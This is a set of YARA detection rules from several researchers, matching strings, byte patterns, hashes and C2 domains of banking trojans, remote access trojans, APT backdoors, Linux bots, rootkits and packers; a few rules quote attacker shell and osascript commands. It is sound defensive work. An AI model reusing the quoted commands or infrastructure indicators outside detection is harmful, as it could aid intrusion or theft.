
rule PUP_InstallRex_AntiFWb {
  meta:
    description = "Malware InstallRex / AntiFW"
    author = "Florian Roth"
    date = "2015-05-13"
    hash = "bb5607cd2ee51f039f60e32cf7edc4e21a2d95cd"
    score = 65
  strings:
    $s4 = "Error %u while loading TSU.DLL %ls" ascii fullword
    $s7 = "GetModuleFileName() failed => %u" ascii fullword
    $s8 = "TSULoader.exe" wide fullword
    $s15 = "\\StringFileInfo\\%04x%04x\\Arguments" wide fullword
    $s17 = "Tsu%08lX.dll" wide fullword
  condition:
    uint16(0) == 23117 and all of them
}

rule LightFTP_fftp_x86_64 {
  meta:
    description = "Detects a light FTP server"
    author = "Florian Roth"
    reference = "https://github.com/hfiref0x/LightFTP"
    date = "2015-05-14"
    hash1 = "989525f85abef05581ccab673e81df3f5d50be36"
    hash2 = "5884aeca33429830b39eba6d3ddb00680037faf4"
    score = 50
  strings:
    $s1 = "fftp.cfg" wide fullword
    $s2 = "220 LightFTP server v1.0 ready" ascii fullword
    $s3 = "*FTP thread exit*" wide fullword
    $s4 = "PASS->logon successful" ascii fullword
    $s5 = "250 Requested file action okay, completed." ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 256000 and 4 of them
}

rule LightFTP_Config {
  meta:
    description = "Detects a light FTP server - config file"
    author = "Florian Roth"
    reference = "https://github.com/hfiref0x/LightFTP"
    date = "2015-05-14"
    hash = "ce9821213538d39775af4a48550eefa3908323c5"
  strings:
    $s2 = "maxusers=" wide
    $s6 = "[ftpconfig]" wide fullword
    $s8 = "accs=readonly" wide fullword
    $s9 = "[anonymous]" wide fullword
    $s10 = "accs=" wide fullword
    $s11 = "pswd=" wide fullword
  condition:
    uint16(0) == 65279 and filesize < 1024 and all of them
}

rule SpyGate_v2_9 {
  meta:
    date = "2014/09"
    maltype = "Spygate v2.9 Remote Access Trojan"
    filetype = "exe"
    reference = "https://blogs.mcafee.com/mcafee-labs/middle-east-developer-spygate-struts-stuff-online"
  strings:
    $1 = "shutdowncomputer" wide
    $2 = "shutdown -r -t 00" wide
    $3 = "blockmouseandkeyboard" wide
    $4 = "ProcessHacker"
    $5 = "FileManagerSplit" wide
  condition:
    all of them
}

rule ice_ix_12xy : banker {
  meta:
    author = "Jean-Philippe Teissier / @Jipe_"
    description = "ICE-IX 1.2.x.y trojan banker"
    date = "2013-01-12"
    filetype = "memory"
    version = "1.0"
  strings:
    $regexp1 = /bn1=.{32}&sk1=[0-9a-zA-Z]{32}/
    $a = "bn1="
    $b = "&sk1="
    $c = "mario"
    $d = "FIXME"
    $e = "RFB 003.003"
    $ggurl = "http://www.google.com/webhp"
  condition:
    $regexp1 or ($a and $b) or all of ($c, $d, $e, $ggurl)
}

rule qadars : banker {
  meta:
    author = "Jean-Philippe Teissier / @Jipe_"
    description = "Qadars - Mobile part. Maybe Perkele."
    version = "1.0"
    filetype = "memory"
    ref1 = "http://www.lexsi-leblog.fr/cert/qadars-nouveau-malware-bancaire-composant-mobile.html"
  strings:
    $cmd1 = "m?D"
    $cmd2 = "m?S"
    $cmd3 = "ALL"
    $cmd4 = "FILTER"
    $cmd5 = "NONE"
    $cmd6 = "KILL"
    $cmd7 = "CANCEL"
    $cmd8 = "SMS"
    $cmd9 = "DIVERT"
    $cmd10 = "MESS"
    $nofilter = "nofilter1111111"
    $botherderphonenumber1 = "+380678409210"
  condition:
    all of ($cmd*) or $nofilter or any of ($botherderphonenumber*)
}

rule shylock : banker {
  meta:
    author = "Jean-Philippe Teissier / @Jipe_"
    description = "Shylock Banker"
    date = "2013-12-12"
    version = "1.0"
    ref1 = "http://iocbucket.com/iocs/1b4660d57928df5ca843c21df0b2adb117026cba"
    ref2 = "http://www.trusteer.com/blog/merchant-fraud-returns-%E2%80%93-shylock-polymorphic-financial-malware-infections-rise"
    ref3 = "https://www.csis.dk/en/csis/blog/3811/"
  strings:
    $process1 = "MASTER"
    $process2 = "_SHUTDOWN"
    $process3 = "EVT_VNC"
    $process4 = "EVT_BACK"
    $process5 = "EVT_VNC"
    $process6 = "IE_Hook::GetRequestInfo"
    $process7 = "FF_Hook::getRequestInfo"
    $process8 = "EX_Hook::CreateProcess"
    $process9 = "hijackdll.dll"
    $process10 = "MTX_"
    $process11 = "FF::PR_WriteHook entry"
    $process12 = "FF::PR_WriteHook exit"
    $process13 = "HijackProcessAttach::*** MASTER *** MASTER *** MASTER *** %s PID=%u"
    $process14 = "HijackProcessAttach::entry"
    $process15 = "FF::BEFORE INJECT"
    $process16 = "FF::AFTER INJECT"
    $process17 = "IE::AFTER INJECT"
    $process18 = "IE::BEFORE INJECT"
    $process19 = "*** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** %s"
    $process20 = "*** LOG INJECTS *** %s"
    $process21 = "*** inject to process %s not allowed"
    $process22 = "*** BackSocks *** BackSocks *** BackSocks *** BackSocks *** BackSocks *** BackSocks *** BackSocks *** %s"
    $process23 = ".?AVFF_Hook@@"
    $process24 = ".?AVIE_Hook@@"
    $process25 = "Inject::InjectDllFromMemory"
    $process26 = "BadSocks.dll"
    $domain1 = "extensadv.cc"
    $domain2 = "topbeat.cc"
    $domain3 = "brainsphere.cc"
    $domain4 = "commonworldme.cc"
    $domain5 = "gigacat.cc"
    $domain6 = "nw-serv.cc"
    $domain7 = "paragua-analyst.cc"
  condition:
    3 of ($process*) or any of ($domain*)
}

rule spyeye : banker {
  meta:
    author = "Jean-Philippe Teissier / @Jipe_"
    description = "SpyEye X.Y memory"
    date = "2012-05-23"
    version = "1.0"
    filetype = "memory"
  strings:
    $spyeye = "SpyEye"
    $a = "%BOTNAME%"
    $b = "globplugins"
    $c = "data_inject"
    $d = "data_before"
    $e = "data_after"
    $f = "data_end"
    $g = "bot_version"
    $h = "bot_guid"
    $i = "TakeBotGuid"
    $j = "TakeGateToCollector"
    $k = "[ERROR] : Omfg! Process is still active? Lets kill that mazafaka!"
    $l = "[ERROR] : Update is not successfull for some reason"
    $m = "[ERROR] : dwErr == %u"
    $n = "GRABBED DATA"
  condition:
    $spyeye or (any of ($a, $b, $c, $d, $e, $f, $g, $h, $i, $j, $k, $l, $m, $n))
}

rule spyeye_plugins : banker {
  meta:
    author = "Jean-Philippe Teissier / @Jipe_"
    description = "SpyEye X.Y Plugins memory"
    date = "2012-05-23"
    version = "1.0"
    filetype = "memory"
  strings:
    $a = "webfakes.dll"
    $b = "config.dat"
    $c = "collectors.txt"
    $d = "webinjects.txt"
    $e = "screenshots.txt"
    $f = "billinghammer.dll"
    $g = "block.dll"
    $h = "bugreport.dll"
    $i = "ccgrabber.dll"
    $j = "connector2.dll"
    $k = "creditgrab.dll"
    $l = "customconnector.dll"
    $m = "ffcertgrabber.dll"
    $n = "ftpbc.dll"
    $o = "rdp.dll"
    $p = "rt_2_4.dll"
    $q = "socks5.dll"
    $r = "spySpread.dll"
    $s = "w2chek4_4.dll"
    $t = "w2chek4_6.dll"
  condition:
    any of them
}

rule callTogether_certificate {
  meta:
    Author = "Fireeye Labs"
    Date = "2014/11/03"
    Description = "detects binaries signed with the CallTogether certificate"
    Reference = "https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html"
  strings:
    $serial = { 45 21 56 C3 B3 FB 01 76 36 5B DB 5B 77 15 BC 4C }
    $o = "CallTogether, Inc."
  condition:
    $serial and $o
}

rule qti_certificate {
  meta:
    Author = "Fireeye Labs"
    Date = "2014/11/03"
    Description = "detects binaries signed with the QTI International Inc certificate"
    Reference = "https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html"
  strings:
    $cn = "QTI International Inc"
    $serial = { 2E DF B9 FD CF A0 0C CB 5A B0 09 EE 3A DB 97 B9 }
  condition:
    $cn and $serial
}

rule DownExecute_A {
  meta:
    Author = "PwC Cyber Threat Operations :: @tlansec"
    Date = "2015/04/27"
    Description = "Malware is often wrapped/protected, best to run on memory"
    Reference = "http://pwc.blogs.com/cyber_security_updates/2015/04/attacks-against-israeli-palestinian-interests.html"
  strings:
    $winver1 = "win 8.1"
    $winver2 = "win Server 2012 R2"
    $winver3 = "win Srv 2012"
    $winver4 = "win srv 2008 R2"
    $winver5 = "win srv 2008"
    $winver6 = "win vsta"
    $winver7 = "win srv 2003 R2"
    $winver8 = "win hm srv"
    $winver9 = "win Strg srv 2003"
    $winver10 = "win srv 2003"
    $winver11 = "win XP prof x64 edt"
    $winver12 = "win XP"
    $winver13 = "win 2000"
    $pdb1 = "D:\\Acms\\2\\docs\\Visual Studio 2013\\Projects\\DownloadExcute\\DownloadExcute\\Release\\DownExecute.pdb"
    $pdb2 = "d:\\acms\\2\\docs\\visual studio 2013\\projects\\downloadexcute\\downloadexcute\\downexecute\\json\\rapidjson\\writer.h"
    $pdb3 = ":\\acms\\2\\docs\\visual studio 2013\\projects\\downloadexcute\\downloadexcute\\downexecute\\json\\rapidjson\\internal/stack.h"
    $pdb4 = "\\downloadexcute\\downexecute\\"
    $magic1 = "<Win Get Version Info Name Error"
    $magic2 = "P@$sw0rd$nd"
    $magic3 = "$t@k0v2rF10w"
    $magic4 = "|*|123xXx(Mutex)xXx321|*|6-21-2014-03:06PM" wide
    $str1 = "Download Excute" ascii wide fullword
    $str2 = "EncryptorFunctionPointer %d"
    $str3 = "%s\\%s.lnk"
    $str4 = "Mac:%s-Cpu:%s-HD:%s"
    $str5 = "feed back responce of host"
    $str6 = "GET Token at host"
    $str7 = "dwn md5 err"
  condition:
    all of ($winver*) or any of ($pdb*) or any of ($magic*) or 2 of ($str*)
}

rule CVE_2015_1674_CNGSYS {
  meta:
    description = "Detects exploits for CVE-2015-1674"
    author = "Florian Roth"
    reference = "http://www.binvul.com/viewthread.php?tid=508"
    reference2 = "https://github.com/Neo23x0/Loki/blob/master/signatures/exploit_cve_2015_1674.yar"
    date = "2015-05-14"
    hash = "af4eb2a275f6bbc2bfeef656642ede9ce04fad36"
  strings:
    $s1 = "\\Device\\CNG" wide fullword
    $s2 = "GetProcAddress" ascii fullword
    $s3 = "LoadLibrary" ascii
    $s4 = "KERNEL32.dll" ascii fullword
    $s5 = "ntdll.dll" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 61440 and all of them
}

rule Pandora {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/Pandora"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $a = "Can't get the Windows version"
    $b = "=M=Q=U=Y=]=a=e=i=m=q=u=y=}="
    $c = "JPEG error #%d" wide
    $d = "Cannot assign a %s to a %s" wide
    $g = "%s, ProgID:"
    $h = "clave"
    $i = "Shell_TrayWnd"
    $j = "melt.bat"
    $k = "\\StubPath"
    $l = "\\logs.dat"
    $m = "1027|Operation has been canceled!"
    $n = "466|You need to plug-in! Double click to install... |"
    $0 = "33|[Keylogger Not Activated!]"
  condition:
    all of them
}

rule Base64_encoded_Executable {
  meta:
    description = "Detects an base64 encoded executable (often embedded)"
    author = "Florian Roth"
    date = "2015-05-28"
    score = 50
  strings:
    $s1 = "TVpTAQEAAAAEAAAA//8AALgAAAA"
    $s2 = "TVoAAAAAAAAAAAAAAAAAAAAAAAA"
    $s3 = "TVqAAAEAAAAEABAAAAAAAAAAAAA"
    $s4 = "TVpQAAIAAAAEAA8A//8AALgAAAA"
    $s5 = "TVqQAAMAAAAEAAAA//8AALgAAAA"
  condition:
    1 of them
}

rule CredStealESY : For CredStealer {
  meta:
    description = "Generic Rule to detect the CredStealer Malware"
    author = "IsecG – McAfee Labs"
    date = "2015/05/08"
  strings:
    $my_hex_string = "CurrentControlSet\\Control\\Keyboard Layouts\\" wide
    $my_hex_string2 = { 89 45 E8 3B 7D E8 7C 0F 8B 45 E8 05 FF 00 00 00 2B C7 89 45 E8 }
  condition:
    $my_hex_string and $my_hex_string2
}

rule Typical_Malware_String_Transforms {
  meta:
    description = "Detects typical strings in a reversed or otherwise modified form"
    author = "Florian Roth"
    reference = "Internal Research"
    date = "2016-07-31"
    score = 60
  strings:
    $e1 = "exe.tsohcvs" ascii fullword
    $e2 = "exe.ssasl" ascii fullword
    $e3 = "exe.rerolpxe" ascii fullword
    $e4 = "exe.erolpxei" ascii fullword
    $e5 = "exe.23lldnur" ascii fullword
    $e6 = "exe.dmc" ascii fullword
    $e7 = "exe.llikksat" ascii fullword
    $l1 = "lld.23lenreK" ascii fullword
    $l2 = "lld.ESABLENREK" ascii fullword
    $l3 = "lld.esabtpyrc" ascii fullword
    $l4 = "lld.trcvsm" ascii fullword
    $l5 = "LLD.LLDTN" ascii fullword
    $i1 = "paeHssecorPteG" ascii fullword
    $i2 = "sserddAcorPteG" ascii fullword
    $i3 = "AyrarbiLdaoL" ascii fullword
    $r1 = "teSlortnoCtnerruC" ascii fullword
    $r2 = "nuR\\noisreVtnerruC" ascii fullword
    $f1 = "\\23metsys\\" ascii
    $f2 = "\\23metsyS\\" ascii
    $f3 = "niB.elcyceR$" ascii fullword
    $f4 = "%tooRmetsyS%" ascii fullword
    $fp1 = "Application Impact Telemetry Static Analyzer" wide fullword
  condition:
    (uint16(0) == 23117 and 1 of them and not 1 of ($fp*))
}

rule Invoke_mimikittenz {
  meta:
    description = "Detects Mimikittenz - file Invoke-mimikittenz.ps1"
    author = "Florian Roth"
    reference = "https://github.com/putterpanda/mimikittenz"
    date = "2016-07-19"
    score = 90
    hash1 = "14e2f70470396a18c27debb419a4f4063c2ad5b6976f429d47f55e31066a5e6a"
  strings:
    $x1 = "[mimikittenz.MemProcInspector]" ascii
    $s1 = "PROCESS_ALL_ACCESS = PROCESS_TERMINATE | PROCESS_CREATE_THREAD | PROCESS_SET_SESSIONID | PROCESS_VM_OPERATION |" ascii fullword
    $s2 = "IntPtr processHandle = MInterop.OpenProcess(MInterop.PROCESS_WM_READ | MInterop.PROCESS_QUERY_INFORMATION, false, process.Id);" ascii fullword
    $s3 = "&email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=" ascii
    $s4 = "[DllImport(\"kernel32.dll\", SetLastError = true)]" ascii fullword
  condition:
    (uint16(0) == 30054 and filesize < 61440 and 2 of them) or $x1
}

rule LinuxAESDDoS {
  meta:
    Author = "@benkow_"
    Date = "2014/09/12"
    Description = "Strings inside"
    Reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483"
  strings:
    $a = "3AES"
    $b = "Hacker"
    $c = "VERSONEX"
  condition:
    2 of them
}

rule LinuxBillGates {
  meta:
    Author = "@benkow_"
    Date = "2014/08/11"
    Description = "Strings inside"
    Reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3429"
  strings:
    $a = "12CUpdateGates"
    $b = "11CUpdateBill"
  condition:
    $a and $b
}

rule LinuxElknot {
  meta:
    Author = "@benkow_"
    Date = "2013/12/24"
    Description = "Strings inside"
    Reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3099"
  strings:
    $a = "ZN8CUtility7DeCryptEPciPKci"
    $b = "ZN13CThreadAttack5StartEP11CCmdMessage"
  condition:
    all of them
}

rule LinuxMrBlack {
  meta:
    Author = "@benkow_"
    Date = "2014/09/12"
    Description = "Strings inside"
    Reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483"
  strings:
    $a = "Mr.Black"
    $b = "VERS0NEX:%s|%d|%d|%s"
  condition:
    $a and $b
}

rule LinuxTsunami {
  meta:
    Author = "@benkow_"
    Date = "2014/09/12"
    Description = "Strings inside"
    Reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483"
  strings:
    $a = "PRIVMSG %s :[STD]Hitting %s"
    $b = "NOTICE %s :TSUNAMI <target> <secs>"
    $c = "NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually."
  condition:
    $a or $b or $c
}

rule rootkit {
  meta:
    author = "xorseed"
    reference = "https://stuff.rop.io/"
  strings:
    $sys1 = "sys_write" ascii wide nocase
    $sys2 = "sys_getdents" ascii wide nocase
    $sys3 = "sys_getdents64" ascii wide nocase
    $sys4 = "sys_getpgid" ascii wide nocase
    $sys5 = "sys_getsid" ascii wide nocase
    $sys6 = "sys_setpgid" ascii wide nocase
    $sys7 = "sys_kill" ascii wide nocase
    $sys8 = "sys_tgkill" ascii wide nocase
    $sys9 = "sys_tkill" ascii wide nocase
    $sys10 = "sys_sched_setscheduler" ascii wide nocase
    $sys11 = "sys_sched_setparam" ascii wide nocase
    $sys12 = "sys_sched_getscheduler" ascii wide nocase
    $sys13 = "sys_sched_getparam" ascii wide nocase
    $sys14 = "sys_sched_setaffinity" ascii wide nocase
    $sys15 = "sys_sched_getaffinity" ascii wide nocase
    $sys16 = "sys_sched_rr_get_interval" ascii wide nocase
    $sys17 = "sys_wait4" ascii wide nocase
    $sys18 = "sys_waitid" ascii wide nocase
    $sys19 = "sys_rt_tgsigqueueinfo" ascii wide nocase
    $sys20 = "sys_rt_sigqueueinfo" ascii wide nocase
    $sys21 = "sys_prlimit64" ascii wide nocase
    $sys22 = "sys_ptrace" ascii wide nocase
    $sys23 = "sys_migrate_pages" ascii wide nocase
    $sys24 = "sys_move_pages" ascii wide nocase
    $sys25 = "sys_get_robust_list" ascii wide nocase
    $sys26 = "sys_perf_event_open" ascii wide nocase
    $sys27 = "sys_uname" ascii wide nocase
    $sys28 = "sys_unlink" ascii wide nocase
    $sys29 = "sys_unlikat" ascii wide nocase
    $sys30 = "sys_rename" ascii wide nocase
    $sys31 = "sys_read" ascii wide nocase
    $sys32 = "kobject_del" ascii wide nocase
    $sys33 = "list_del_init" ascii wide nocase
    $sys34 = "inet_ioctl" ascii wide nocase
  condition:
    9 of them
}

rule exploit {
  meta:
    author = "xorseed"
    reference = "https://stuff.rop.io/"
  strings:
    $xpl1 = "set_fs_root" ascii wide nocase
    $xpl2 = "set_fs_pwd" ascii wide nocase
    $xpl3 = "__virt_addr_valid" ascii wide nocase
    $xpl4 = "init_task" ascii wide nocase
    $xpl5 = "init_fs" ascii wide nocase
    $xpl6 = "bad_file_ops" ascii wide nocase
    $xpl7 = "bad_file_aio_read" ascii wide nocase
    $xpl8 = "security_ops" ascii wide nocase
    $xpl9 = "default_security_ops" ascii wide nocase
    $xpl10 = "audit_enabled" ascii wide nocase
    $xpl11 = "commit_creds" ascii wide nocase
    $xpl12 = "prepare_kernel_cred" ascii wide nocase
    $xpl13 = "ptmx_fops" ascii wide nocase
    $xpl14 = "node_states" ascii wide nocase
  condition:
    7 of them
}

rule nkminer_monero {
  meta:
    description = "Detects installer of Monero miner that points to a NK domain"
    author = "cdoman@alienvault.com"
    reference = "https://www.alienvault.com/blogs/labs-research/a-north-korean-monero-cryptocurrency-miner"
    tlp = "white"
    license = "MIT License"
  strings:
    $a = "82e999fb-a6e0-4094-aa1f-1a306069d1a5" ascii wide nocase
    $b = "4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRy5YeFCqgoUMnzumvS" ascii wide nocase
    $c = "barjuok.ryongnamsan.edu.kp" ascii wide nocase
    $d = "C:\\SoftwaresInstall\\soft" ascii wide nocase
    $e = "C:\\Windows\\Sys64\\intelservice.exe" ascii wide nocase
    $f = "C:\\Windows\\Sys64\\updater.exe" ascii wide nocase
    $g = "C:\\Users\\Jawhar\\documents\\" ascii wide nocase
  condition:
    any of them
}

rule NSFreeCode : NSFree Family {
  meta:
    description = "NSFree code features"
    author = "Seth Hardy"
    last_modified = "2014-06-24"
  strings:
    $ = { 53 56 57 66 81 38 4D 5A }
    $ = { 90 90 90 90 81 3F 50 45 00 00 }
  condition:
    all of them
}

rule NSFreeStrings : NSFree Family {
  meta:
    description = "NSFree Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-06-24"
  strings:
    $ = "\\MicNS\\" nocase
    $ = "NSFreeDll" ascii wide
    $ = { 0C 30 31 2B 78 28 2A 37 3F 2A 39 35 78 3B 39 36 36 37 }
  condition:
    any of them
}

rule NSFree : Family {
  meta:
    description = "NSFree"
    author = "Seth Hardy"
    last_modified = "2014-06-24"
  condition:
    NSFreeCode or NSFreeStrings
}

rule NaikonCode : Naikon Family {
  meta:
    description = "Naikon code features"
    author = "Seth Hardy"
    last_modified = "2014-06-25"
  strings:
    $ = { 0F AF C1 C1 E0 1F }
    $ = { 35 5A 01 00 00 }
    $ = { 81 C2 7F 14 06 00 }
  condition:
    all of them
}

rule NaikonStrings : Naikon Family {
  meta:
    description = "Naikon Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-06-25"
  strings:
    $ = "NOKIAN95/WEB"
    $ = "/tag=info&id=15"
    $ = "skg(3)=&3.2d_u1"
    $ = "\\Temp\\iExplorer.exe"
    $ = "\\Temp\\\"TSG\""
  condition:
    any of them
}

rule Naikon : Family {
  meta:
    description = "Naikon"
    author = "Seth Hardy"
    last_modified = "2014-06-25"
  condition:
    NaikonCode or NaikonStrings
}

rule Backdoor_Naikon_APT_Sample1 {
  meta:
    description = "Detects backdoors related to the Naikon APT"
    author = "Florian Roth"
    reference = "https://goo.gl/7vHyvh"
    date = "2015-05-14"
    hash = "d5716c80cba8554eb79eecfb4aa3d99faf0435a1833ec5ef51f528146c758eba"
    hash = "f5ab8e49c0778fa208baad660fe4fa40fc8a114f5f71614afbd6dcc09625cb96"
  strings:
    $x0 = "GET http://%s:%d/aspxabcdef.asp?%s HTTP/1.1" ascii fullword
    $x1 = "POST http://%s:%d/aspxabcdefg.asp?%s HTTP/1.1" ascii fullword
    $x2 = "greensky27.vicp.net" ascii fullword
    $x3 = "\\tempvxd.vxd.dll" wide fullword
    $x4 = "otna.vicp.net" ascii fullword
    $x5 = "smithking19.gicp.net" ascii fullword
    $s1 = "User-Agent: webclient" ascii fullword
    $s2 = "\\User.ini" ascii fullword
    $s3 = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/200" ascii
    $s4 = "\\UserProfile.dll" wide fullword
    $s5 = "Connection:Keep-Alive: %d" ascii fullword
    $s6 = "Referer: http://%s:%d/" ascii fullword
    $s7 = "%s %s %s %d %d %d " ascii fullword
    $s8 = "%s--%s" wide fullword
    $s9 = "Run File Success!" wide fullword
    $s10 = "DRIVE_REMOTE" wide fullword
    $s11 = "ProxyEnable" wide fullword
    $s12 = "\\cmd.exe" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 1024000 and (1 of ($x*) or 7 of ($s*))
}

rule nAspyUpdateCode : nAspyUpdate Family {
  meta:
    description = "nAspyUpdate code features"
    author = "Seth Hardy"
    last_modified = "2014-07-14"
  strings:
    $ = { 8A 54 24 14 8A 01 32 C2 02 C2 88 01 41 4E 75 F4 }
  condition:
    any of them
}

rule nAspyUpdateStrings : nAspyUpdate Family {
  meta:
    description = "nAspyUpdate Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-07-14"
  strings:
    $ = "\\httpclient.txt"
    $ = "password <=14"
    $ = "/%ldn.txt"
    $ = "Kill You\x00"
  condition:
    any of them
}

rule nAspyUpdate : Family {
  meta:
    description = "nAspyUpdate"
    author = "Seth Hardy"
    last_modified = "2014-07-14"
  condition:
    nAspyUpdateCode or nAspyUpdateStrings
}

rule NetpassStrings : NetPass Variant {
  meta:
    description = "Identifiers for netpass variant"
    author = "Katie Kleemola"
    last_updated = "2014-05-29"
  strings:
    $exif1 = "Device Protect ApplicatioN" wide
    $exif2 = "beep.sys" wide
    $exif3 = "BEEP Driver" wide
    $string1 = "\x00NetPass Update\x00"
    $string2 = "\x00%s:DOWNLOAD\x00"
    $string3 = "\x00%s:UPDATE\x00"
    $string4 = "\x00%s:uNINSTALL\x00"
  condition:
    all of ($exif*) or any of ($string*)
}

rule NetPass : Variant {
  meta:
    description = "netpass variant"
    author = "Katie Kleemola"
    last_updated = "2014-07-08"
  condition:
    NetpassStrings
}

rule NetTravStrings : NetTraveler Family {
  meta:
    description = "Identifiers for NetTraveler DLL"
    author = "Katie Kleemola"
    last_updated = "2014-05-20"
  strings:
    $ = "?action=updated&hostid="
    $ = "travlerbackinfo"
    $ = "?action=getcmd&hostid="
    $ = "%s?action=gotcmd&hostid="
    $ = "%s?hostid=%s&hostname=%s&hostip=%s&filename=%s&filestart=%u&filetext="
    $ = "\x00Method1 Fail!!!!!\x00"
    $ = "\x00Method3 Fail!!!!!\x00"
    $ = "\x00method currect:\x00"
    $ = /\x00\x00[\w\-]+ is Running!\x00\x00/
    $ = "\x00OtherTwo\x00"
  condition:
    any of them
}

rule NetTravExports : NetTraveler Family {
  meta:
    description = "Export names for dll component"
    author = "Katie Kleemola"
    last_updated = "2014-05-20"
  strings:
    $ = "?InjectDll@@YAHPAUHWND__@@K@Z"
    $ = "?UnmapDll@@YAHXZ"
    $ = "?g_bSubclassed@@3HA"
  condition:
    any of them
}

rule NetTraveler : Family {
  meta:
    description = "Nettravelr"
    author = "Katie Kleemola"
    last_updated = "2014-07-08"
  condition:
    NetTravExports or NetTravStrings or NetpassStrings
}

rule NionSpy : win32 {
  meta:
    description = "Triggers on old and new variants of W32/NionSpy file infector"
    reference = "https://blogs.mcafee.com/mcafee-labs/taking-a-close-look-at-data-stealing-nionspy-file-infector"
  strings:
    $variant2015_infmarker = "aCfG92KXpcSo4Y94BnUrFmnNk27EhW6CqP5EnT"
    $variant2013_infmarker = "ad6af8bd5835d19cc7fdc4c62fdf02a1"
    $variant2013_string = "%s?cstorage=shell&comp=%s"
  condition:
    uint16(0) == 23117 and uint32(uint32(60)) == 17744 and 1 of ($variant*)
}

rule TROJAN_Notepad {
  meta:
    Author = "RSA_IR"
    Date = "4Jun13"
    File = "notepad.exe v 1.1"
    MD5 = "106E63DBDA3A76BEEB53A8BBD8F98927"
  strings:
    $s1 = "75BAA77C842BE168B0F66C42C7885997"
    $s2 = "B523F63566F407F3834BCC54AAA32524"
  condition:
    $s1 or $s2
}

rule leverage_a {
  meta:
    author = "earada@alienvault.com"
    version = "1.0"
    description = "OSX/Leverage.A"
    date = "2013/09"
  strings:
    $a1 = "ioreg -l | grep \"IOPlatformSerialNumber\" | awk -F"
    $a2 = "+:Users:Shared:UserEvent.app:Contents:MacOS:"
    $a3 = "rm '/Users/Shared/UserEvent.app/Contents/Resources/UserEvent.icns'"
    $script1 = "osascript -e 'tell application \"System Events\" to get the hidden of every login item'"
    $script2 = "osascript -e 'tell application \"System Events\" to get the name of every login item'"
    $script3 = "osascript -e 'tell application \"System Events\" to get the path of every login item'"
    $properties = "serverVisible \x00"
  condition:
    all of them
}

rule Odinaff_swift : malware odinaff swift raw {
  meta:
    author = "@j0sm1"
    date = "2016/10/27"
    description = "Odinaff malware"
    reference = "https://www.symantec.com/security_response/writeup.jsp?docid=2016-083006-4847-99"
    filetype = "binary"
  strings:
    $s1 = "getapula.pdb"
    $i1 = "wtsapi32.dll"
    $i2 = "cmpbk32.dll"
    $i3 = "PostMessageA"
    $i4 = "PeekMessageW"
    $i5 = "DispatchMessageW"
    $i6 = "WTSEnumerateSessionsA"
  condition:
    ($s1 or pe.exports("Tyman32")) and (2 of ($i*))
}

rule OlyxCode : Olyx Family {
  meta:
    description = "Olyx code tricks"
    author = "Seth Hardy"
    last_modified = "2014-06-19"
  strings:
    $six = { C7 40 04 36 36 36 36 C7 40 08 36 36 36 36 }
    $slash = { C7 40 04 5C 5C 5C 5C C7 40 08 5C 5C 5C 5C }
  condition:
    any of them
}

rule OlyxStrings : Olyx Family {
  meta:
    description = "Olyx Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-06-19"
  strings:
    $ = "/Applications/Automator.app/Contents/MacOS/DockLight"
  condition:
    any of them
}

rule Olyx : Family {
  meta:
    description = "Olyx"
    author = "Seth Hardy"
    last_modified = "2014-06-19"
  condition:
    OlyxCode or OlyxStrings
}

rule suspicious_packer_section : packer PE {
  meta:
    author = "@j0sm1"
    date = "2016/10/21"
    description = "The packer/protector section names/keywords"
    reference = "http://www.hexacorn.com/blog/2012/10/14/random-stats-from-1-2m-samples-pe-section-names/"
    filetype = "binary"
  strings:
    $s1 = ".aspack" ascii wide
    $s2 = ".adata" ascii wide
    $s3 = "ASPack" ascii wide
    $s4 = ".ASPack" ascii wide
    $s5 = ".ccg" ascii wide
    $s6 = "BitArts" ascii wide
    $s7 = "DAStub" ascii wide
    $s8 = "!EPack" ascii wide
    $s9 = "FSG!" ascii wide
    $s10 = "kkrunchy" ascii wide
    $s11 = ".mackt" ascii wide
    $s12 = ".MaskPE" ascii wide
    $s13 = "MEW" ascii wide
    $s14 = ".MPRESS1" ascii wide
    $s15 = ".MPRESS2" ascii wide
    $s16 = ".neolite" ascii wide
    $s17 = ".neolit" ascii wide
    $s18 = ".nsp1" ascii wide
    $s19 = ".nsp2" ascii wide
    $s20 = ".nsp0" ascii wide
    $s21 = "nsp0" ascii wide
    $s22 = "nsp1" ascii wide
    $s23 = "nsp2" ascii wide
    $s24 = ".packed" ascii wide
    $s25 = "pebundle" ascii wide
    $s26 = "PEBundle" ascii wide
    $s27 = "PEC2TO" ascii wide
    $s28 = "PECompact2" ascii wide
    $s29 = "PEC2" ascii wide
    $s30 = "pec1" ascii wide
    $s31 = "pec2" ascii wide
    $s32 = "PEC2MO" ascii wide
    $s33 = "PELOCKnt" ascii wide
    $s34 = ".perplex" ascii wide
    $s35 = "PESHiELD" ascii wide
    $s36 = ".petite" ascii wide
    $s37 = "ProCrypt" ascii wide
    $s38 = ".RLPack" ascii wide
    $s39 = "RCryptor" ascii wide
    $s40 = ".RPCrypt" ascii wide
    $s41 = ".sforce3" ascii wide
    $s42 = ".spack" ascii wide
